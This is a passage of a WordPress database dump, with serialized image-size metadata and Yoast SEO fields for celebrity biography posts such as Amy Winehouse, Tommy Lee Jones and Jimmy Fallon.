height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1765,269,'_thumbnail_id','270'),(1766,269,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1767,269,'slide_template',''),(1768,269,'_yoast_wpseo_focuskw','amy winehouse'),(1769,269,'_yoast_wpseo_title','Amy Winehouse'),(1770,269,'_yoast_wpseo_metadesc','Amy Winehouse was one of the greatest soul and jazz singers of today. Learn about her career accomplishments, personal life, and what she\'s most known for.'),(1771,269,'_yoast_wpseo_linkdex','83'),(1772,269,'post_views_count','307'),(1784,272,'_edit_lock','1444409161:6'),(1785,273,'_edit_lock','1444409140:6'),(1786,274,'_edit_lock','1444409092:6'),(1787,275,'_edit_lock','1444409056:6'),(1788,276,'_edit_lock','1444408960:6'),(1789,272,'_edit_last','6'),(1790,277,'_wp_attached_file','2015/09/Tommy-Lee-Jones.jpg'),(1791,277,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:27:\"2015/09/Tommy-Lee-Jones.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Tommy-Lee-Jones-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Tommy-Lee-Jones-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Tommy-Lee-Jones-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1792,272,'_thumbnail_id','277'),(1794,272,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1795,272,'slide_template',''),(1796,272,'_yoast_wpseo_focuskw','Tommy Lee Jones'),(1797,272,'_yoast_wpseo_title','Tommy Lee Jones'),(1798,272,'_yoast_wpseo_metadesc','Tommy Lee Jones has a rich history and an even more interesting personal life. Learn how this amazing actor got started and how he has done over the years with his career.'),(1799,272,'_yoast_wpseo_linkdex','85'),(1800,272,'post_views_count','221'),(1802,273,'_edit_last','6'),(1803,278,'_wp_attached_file','2015/09/Marc-Anthony.jpg'),(1804,278,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:686;s:6:\"height\";i:599;s:4:\"file\";s:24:\"2015/09/Marc-Anthony.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-300x262.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Marc-Anthony-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Marc-Anthony-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-686x385.jpg\";s:5:\"width\";i:686;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-686x486.jpg\";s:5:\"width\";i:686;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-686x580.jpg\";s:5:\"width\";i:686;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Marc-Anthony-481x420.jpg\";s:5:\"width\";i:481;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1805,273,'_thumbnail_id','278'),(1807,273,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1808,273,'slide_template',''),(1809,273,'_yoast_wpseo_metadesc','Marco Antonio Muniz is a very accomplished singer and songwriter. Learn how this man was able to rise to fame, and the current struggles he has had to deal with along the way.'),(1810,273,'post_views_count','232'),(1812,273,'_yoast_wpseo_focuskw','Marc Anthony'),(1813,273,'_yoast_wpseo_title','Marc Anthony'),(1814,273,'_yoast_wpseo_linkdex','75'),(1816,274,'_edit_last','6'),(1817,280,'_wp_attached_file','2015/09/Kyle-Chandler.jpg'),(1818,280,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:25:\"2015/09/Kyle-Chandler.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Kyle-Chandler-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Kyle-Chandler-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Kyle-Chandler-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:22:\"Charlie Llewellin 2008\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1819,274,'_thumbnail_id','280'),(1821,274,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1822,274,'slide_template',''),(1823,274,'_yoast_wpseo_focuskw','Kyle Chandler'),(1824,274,'_yoast_wpseo_title','Kyle Chandler'),(1825,274,'_yoast_wpseo_metadesc','Chandler is an interesting man. He\'s even more interesting when you take a look at the colorful background he has. Learn about where he grew up, his life, and the career he has led.'),(1826,274,'_yoast_wpseo_linkdex','75'),(1827,274,'post_views_count','517'),(1830,275,'_edit_last','6'),(1831,282,'_wp_attached_file','2015/09/James-Gandolfini.jpg'),(1832,282,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:28:\"2015/09/James-Gandolfini.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"James-Gandolfini-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"James-Gandolfini-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"James-Gandolfini-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1833,275,'_thumbnail_id','282'),(1835,275,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1836,275,'slide_template',''),(1837,275,'_yoast_wpseo_focuskw','James Gandolfini'),(1838,275,'_yoast_wpseo_title','James Gandolfini'),(1839,275,'_yoast_wpseo_metadesc','James Gandolfini left behind a legend and legacy for his career. He\'s a man who passed away long before his time, but dedicated much of it to helping others. Learn more here.'),(1840,275,'_yoast_wpseo_linkdex','79'),(1841,275,'post_views_count','237'),(1843,276,'_edit_last','6'),(1844,284,'_wp_attached_file','2015/09/Jimmy-Fallon.jpg'),(1845,284,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:24:\"2015/09/Jimmy-Fallon.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Jimmy-Fallon-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Jimmy-Fallon-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Jimmy-Fallon-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1846,276,'_thumbnail_id','284'),(1847,276,'post_views_count','215'),(1849,276,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1850,276,'slide_template',''),(1851,276,'_yoast_wpseo_focuskw','Jimmy Fallon'),(1852,276,'_yoast_wpseo_title','Jimmy Fallon'),(1853,276,'_yoast_wpseo_metadesc','Jimmy Fallon is most famous for his appearances on late night talk shows. Learn about how he got started in his career and the upbringing he has had during his childhood.'),(1854,276,'_yoast_wpseo_linkdex','81'),(1867,294,'_edit_lock','1444408899:6'),(1868,294,'_edit_last','6'),(1869,295,'_edit_lock','1444408872:6'),(1874,300,'_wp_attached_file','2015/09/Andrea-Bocelli.jpg'),(1875,300,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:593;s:4:\"file\";s:26:\"2015/09/Andrea-Bocelli.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-300x278.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Andrea-Bocelli-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Andrea-Bocelli-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Andrea-Bocelli-534x462.jpg\";s:5:\"w